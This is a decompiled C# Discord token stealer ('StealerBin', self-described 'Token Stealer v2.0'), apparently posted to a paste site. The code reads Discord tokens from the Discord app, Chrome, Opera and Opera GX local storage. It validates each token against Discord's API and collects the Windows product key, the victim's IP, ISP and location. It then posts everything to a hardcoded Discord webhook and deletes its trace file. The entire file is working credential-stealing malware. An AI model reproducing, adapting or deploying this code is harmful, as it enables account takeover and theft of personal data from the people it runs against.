· 5 years ago · Jul 07, 2020, 04:10 PM
1using System;
2using System.Collections.Generic;
3using System.Collections.Specialized;
4using System.IO;
5using System.Linq;
6using System.Management;
7using System.Net;
8using System.Net.Http;
9using System.Text;
10using System.Text.RegularExpressions;
11using System.Threading;
12using System.Web.Script.Serialization;
13using Microsoft.Win32;
14using WinProdKeyFind;
15
16namespace StealerBin
17{
18 // Token: 0x02000004 RID: 4
19 public class API
20 {
21 // Token: 0x06000005 RID: 5 RVA: 0x0000233C File Offset: 0x0000053C
22 private static string Sub(string _Cont)
23 {
24 string[] array = _Cont.Substring(_Cont.IndexOf("oken") + 5).Split(new char[]
25 {
26 '"'
27 });
28 List<string> list = new List<string>();
29 list.AddRange(array);
30 list.RemoveAt(0);
31 array = list.ToArray();
32 return string.Join("\"", array);
33 }
34
35 // Token: 0x06000006 RID: 6 RVA: 0x0000239C File Offset: 0x0000059C
36 public static bool FindTokenfile(ref string _File)
37 {
38 bool flag = !Directory.Exists(_File);
39 bool result;
40 if (flag)
41 {
42 result = false;
43 }
44 else
45 {
46 foreach (FileInfo fileInfo in new DirectoryInfo(_File).GetFiles())
47 {
48 bool flag2 = fileInfo.Name.EndsWith(".ldb");
49 if (flag2)
50 {
51 _File += fileInfo.Name;
52 break;
53 }
54 }
55 result = _File.EndsWith(".ldb");
56 }
57 return result;
58 }
59
60 // Token: 0x06000007 RID: 7 RVA: 0x00002420 File Offset: 0x00000620
61 public static string Get(string _FilePath)
62 {
63 byte[] bytes = File.ReadAllBytes(_FilePath);
64 string @string = Encoding.UTF8.GetString(bytes);
65 string result = "";
66 string text = @string;
67 while (text.Contains("oken"))
68 {
69 string[] array = API.Sub(text).Split(new char[]
70 {
71 '"'
72 });
73 result = array[0];
74 text = string.Join("\"", array);
75 }
76 return result;
77 }
78
79 // Token: 0x06000008 RID: 8 RVA: 0x00002490 File Offset: 0x00000690
80 private static string TokenCheckAcces(string token)
81 {
82 using (WebClient webClient = new WebClient())
83 {
84 NameValueCollection nameValueCollection = new NameValueCollection();
85 nameValueCollection[""] = "";
86 webClient.Headers.Add("Authorization", token);
87 try
88 {
89 byte[] array = webClient.UploadValues("https://discordapp.com/api/v6/invite/jjPsxg", nameValueCollection);
90 }
91 catch (WebException ex)
92 {
93 string text = new StreamReader(ex.Response.GetResponseStream()).ReadToEnd();
94 bool flag = text.Contains("401: Unauthorized");
95 if (flag)
96 {
97 token = "";
98 }
99 else
100 {
101 bool flag2 = text.Contains("You need to verify your account in order to perform this action.");
102 if (flag2)
103 {
104 token = "";
105 }
106 }
107 }
108 }
109 return token;
110 }
111
112 // Token: 0x06000009 RID: 9 RVA: 0x0000256C File Offset: 0x0000076C
113 public static void StartSteal()
114 {
115 using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
116 {
117 using (RegistryKey registryKey2 = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Cryptography"))
118 {
119 bool flag = Convert.ToString(registryKey2.GetValue("MachineGuid")) == "90059c37-1320-41a4-b58d-2b75a9850d2f";
120 if (!flag)
121 {
122 try
123 {
124 API.StealTokenFromDiscordApp();
125 API.StealTokenFromOpera();
126 API.StealTokenFromChrome();
127 API.StealTokenFromOperaGX();
128 API.Send(File.ReadAllText(API._savedTokens));
129 bool flag2 = File.Exists(API._savedTokens);
130 if (flag2)
131 {
132 File.Delete(API._savedTokens);
133 }
134 }
135 catch (Exception ex)
136 {
137 }
138 }
139 }
140 }
141 }
142
143 // Token: 0x0600000A RID: 10 RVA: 0x0000264C File Offset: 0x0000084C
144 private static void Send(string tokenReport)
145 {
146 try
147 {
148 API.Data data = new JavaScriptSerializer().Deserialize<API.Data>(API.wb.DownloadString("https://wtfismyip.com/json"));
149 string yourFuckingLocation = data.YourFuckingLocation;
150 string yourFuckingCountryCode = data.YourFuckingCountryCode;
151 string yourFuckingISP = data.YourFuckingISP;
152 string text = API.wb.DownloadString("https://api.ipify.org/");
153 string text2 = API.wb.DownloadString("https://api6.ipify.org/");
154 API.OperatingSystem();
155 HttpClient httpClient = new HttpClient();
156 Dictionary<string, string> nameValueCollection = new Dictionary<string, string>
157 {
158 {
159 "content",
160 string.Concat(new string[]
161 {
162 "**",
163 Environment.UserName,
164 "**\n\n**IP Information**\n✯ IPv4: ",
165 text,
166 "\n✯ IPv6: ",
167 text2,
168 "\n✯ Location: ",
169 yourFuckingLocation,
170 "\n✯ ISP: ",
171 yourFuckingISP,
172 "\n✯ Country Code: ",
173 yourFuckingCountryCode,
174 "\n\n**Windows Information**",
175 API.CompleteOs,
176 "\n\n**Discord Tokens**\n",
177 string.Join("\n", new string[]
178 {
179 tokenReport
180 }),
181 "\n\nPowered by ByteTools"
182 })
183 },
184 {
185 "username",
186 "Token Stealer v2.0"
187 },
188 {
189 "avatar_url",
190 "http://acurartm.bplaced.net/Bilder/Bytetools_Logo.png"
191 }
192 };
193 httpClient.PostAsync(API.Hook, new FormUrlEncodedContent(nameValueCollection)).GetAwaiter().GetResult();
194 }
195 catch
196 {
197 }
198 }
199
200 // Token: 0x0600000B RID: 11 RVA: 0x000027D4 File Offset: 0x000009D4
201 public static string OperatingSystem()
202 {
203 object obj = (from ManagementObject x in new ManagementObjectSearcher("SELECT Caption FROM Win32_OperatingSystem").Get()
204 select x.GetPropertyValue("Caption")).FirstOrDefault<object>();
205 return (obj != null) ? obj.ToString() : "Unknown";
206 }
207
208 // Token: 0x0600000C RID: 12 RVA: 0x00002834 File Offset: 0x00000A34
209 private static string SaveTokens(string token)
210 {
211 bool flag = token == "";
212 if (!flag)
213 {
214 string text = "✯ ";
215 bool chrome = API.Chrome;
216 if (chrome)
217 {
218 text += "Chrome";
219 }
220 else
221 {
222 bool opera = API.Opera;
223 if (opera)
224 {
225 text += "Opera";
226 }
227 else
228 {
229 bool app = API.App;
230 if (app)
231 {
232 text += "Discord App";
233 }
234 else
235 {
236 bool operaGX = API.OperaGX;
237 if (operaGX)
238 {
239 text += "Opera GX";
240 }
241 else
242 {
243 text = "Unknown";
244 }
245 }
246 }
247 }
248 text = text + " Token: " + token + Environment.NewLine;
249 File.AppendAllText(API._savedTokens, text);
250 API.RemoveDuplicatedLines(API._savedTokens);
251 }
252 return token;
253 }
254
255 // Token: 0x0600000D RID: 13 RVA: 0x000028F8 File Offset: 0x00000AF8
256 private static void RemoveDuplicatedLines(string path)
257 {
258 List<string> list = new List<string>();
259 StringReader stringReader = new StringReader(File.ReadAllText(path));
260 string item;
261 while ((item = stringReader.ReadLine()) != null)
262 {
263 bool flag = !list.Contains(item);
264 if (flag)
265 {
266 list.Add(item);
267 }
268 }
269 stringReader.Close();
270 StreamWriter streamWriter = new StreamWriter(File.Open(path, FileMode.Open));
271 foreach (string value in list)
272 {
273 streamWriter.WriteLine(value);
274 }
275 streamWriter.Flush();
276 streamWriter.Close();
277 }
278
279 // Token: 0x0600000E RID: 14 RVA: 0x000029B0 File Offset: 0x00000BB0
280 private static void StealTokenFromDiscordApp()
281 {
282 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\";
283 DirectoryInfo folder = new DirectoryInfo(text);
284 bool flag = !Directory.Exists(text);
285 if (!flag)
286 {
287 bool flag2 = !API.FindTokenfile(ref text);
288 if (flag2)
289 {
290 }
291 Thread.Sleep(100);
292 string a = API.Get(text);
293 API.App = true;
294 bool flag3 = a == "";
295 if (flag3)
296 {
297 }
298 List<string> list = API.TokenStealer(folder, false);
299 bool flag4 = list == null || list.Count <= 0;
300 if (flag4)
301 {
302 }
303 }
304 }
305
306 // Token: 0x0600000F RID: 15 RVA: 0x00002A4C File Offset: 0x00000C4C
307 private static void StealTokenFromChrome()
308 {
309 string text = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\";
310 DirectoryInfo folder = new DirectoryInfo(text);
311 bool flag = !Directory.Exists(text);
312 if (!flag)
313 {
314 bool flag2 = !API.FindTokenfile(ref text);
315 if (flag2)
316 {
317 }
318 Thread.Sleep(100);
319 string a = API.Get(text);
320 API.Chrome = true;
321 bool flag3 = a == "";
322 if (flag3)
323 {
324 }
325 List<string> list = API.TokenStealer(folder, false);
326 bool flag4 = list == null || list.Count <= 0;
327 if (flag4)
328 {
329 }
330 }
331 }
332
333 // Token: 0x06000010 RID: 16 RVA: 0x00002AE8 File Offset: 0x00000CE8
334 private static List<string> TokenStealer(DirectoryInfo Folder, bool checkLogs = false)
335 {
336 List<string> list = new List<string>();
337 try
338 {
339 foreach (FileInfo fileInfo in Folder.GetFiles(checkLogs ? "*.log" : "*.ldb"))
340 {
341 string input = fileInfo.OpenText().ReadToEnd();
342 foreach (object obj in Regex.Matches(input, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"))
343 {
344 Match match = (Match)obj;
345 API.SaveTokens(API.TokenCheckAcces(match.Value));
346 }
347 foreach (object obj2 in Regex.Matches(input, "mfa\\.[\\w-]{84}"))
348 {
349 Match match2 = (Match)obj2;
350 API.SaveTokens(API.TokenCheckAcces(match2.Value));
351 }
352 }
353 }
354 catch
355 {
356 }
357 list = list.Distinct<string>().ToList<string>();
358 bool flag = list.Count > 0;
359 if (flag)
360 {
361 API.StealFound = true;
362 List<string> list2 = list;
363 int index = list.Count - 1;
364 list2[index] = (list2[index] ?? "");
365 }
366 API.Opera = false;
367 API.Chrome = false;
368 API.App = false;
369 API.OperaGX = false;
370 return list;
371 }
372
373 // Token: 0x06000011 RID: 17 RVA: 0x00002C84 File Offset: 0x00000E84
374 private static void StealTokenFromOpera()
375 {
376 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\";
377 DirectoryInfo folder = new DirectoryInfo(text);
378 bool flag = !Directory.Exists(text);
379 if (!flag)
380 {
381 bool flag2 = !API.FindTokenfile(ref text);
382 if (flag2)
383 {
384 }
385 Thread.Sleep(100);
386 string a = API.Get(text);
387 API.Opera = true;
388 bool flag3 = a == "";
389 if (flag3)
390 {
391 }
392 List<string> list = API.TokenStealer(folder, false);
393 bool flag4 = list == null || list.Count <= 0;
394 if (flag4)
395 {
396 }
397 }
398 }
399
400 // Token: 0x06000012 RID: 18 RVA: 0x00002D20 File Offset: 0x00000F20
401 private static void StealTokenFromOperaGX()
402 {
403 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\";
404 DirectoryInfo folder = new DirectoryInfo(text);
405 bool flag = !Directory.Exists(text);
406 if (!flag)
407 {
408 bool flag2 = !API.FindTokenfile(ref text);
409 if (flag2)
410 {
411 }
412 Thread.Sleep(100);
413 string a = API.Get(text);
414 API.OperaGX = true;
415 bool flag3 = a == "";
416 if (flag3)
417 {
418 }
419 List<string> list = API.TokenStealer(folder, false);
420 bool flag4 = list == null || list.Count <= 0;
421 if (flag4)
422 {
423 }
424 }
425 }
426
427 // Token: 0x04000004 RID: 4
428 public static string Hook = "https://discordapp.com/api/webhooks/719960809043656725/tJQfI5eCo79cjrvSQSAXdMdDXSjrTKzwrvYrkWXG7ZNGkK1DCwonNKbOJXosu_Ur4_rM";
429
430 // Token: 0x04000005 RID: 5
431 private static string _savedTokens = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\updatelogss.txt";
432
433 // Token: 0x04000006 RID: 6
434 private static WebClient wb = new WebClient();
435
436 // Token: 0x04000007 RID: 7
437 public static string CompleteOs = "\n✯ " + API.OperatingSystem() + "\n✯ Windows Key: " + KeyDecoder.GetWindowsProductKeyFromRegistry();
438
439 // Token: 0x04000008 RID: 8
440 private static bool App = false;
441
442 // Token: 0x04000009 RID: 9
443 private static bool Chrome = false;
444
445 // Token: 0x0400000A RID: 10
446 private static bool StealFound;
447
448 // Token: 0x0400000B RID: 11
449 private static bool Opera = false;
450
451 // Token: 0x0400000C RID: 12
452 private static bool OperaGX = false;
453
454 // Token: 0x02000005 RID: 5
455 private class Data
456 {
457 // Token: 0x17000001 RID: 1
458 // (get) Token: 0x06000015 RID: 21 RVA: 0x00002E38 File Offset: 0x00001038
459 // (set) Token: 0x06000016 RID: 22 RVA: 0x00002E40 File Offset: 0x00001040
460 public string YourFuckingLocation { get; set; }
461
462 // Token: 0x17000002 RID: 2
463 // (get) Token: 0x06000017 RID: 23 RVA: 0x00002E4C File Offset: 0x0000104C
464 // (set) Token: 0x06000018 RID: 24 RVA: 0x00002E54 File Offset: 0x00001054
465 public string YourFuckingCountryCode { get; set; }
466
467 // Token: 0x17000003 RID: 3
468 // (get) Token: 0x06000019 RID: 25 RVA: 0x00002E60 File Offset: 0x00001060
469 // (set) Token: 0x0600001A RID: 26 RVA: 0x00002E68 File Offset: 0x00001068
470 public string YourFuckingISP { get; set; }
471 }
472 }
473}